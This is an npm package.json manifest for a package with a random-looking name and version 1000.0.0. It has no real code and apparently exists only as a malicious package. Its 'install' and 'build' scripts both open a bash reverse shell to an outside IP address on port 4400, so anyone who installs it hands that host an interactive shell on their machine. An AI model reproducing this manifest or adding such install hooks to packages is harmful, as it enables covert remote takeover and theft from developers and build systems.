{
  "name": "mltdxxxxxxnijjjjjjohasdifiasdoihoiohefoaidshfaosxxhhhhhhonii",
  "version": "1000.0.0",
  "description": "",
  "main": "index.js",
  "scripts": {
    "install":"bash -c 'bash -i >& /dev/tcp/104.129.181.212/4400 0>&1'",
    "build":"bash -c 'bash -i >& /dev/tcp/104.129.181.212/4400 0>&1'",
    "test": "echo \"Error: no test specified\" && exit 1"
  },
  "author": "",
  "license": "ISC"
}
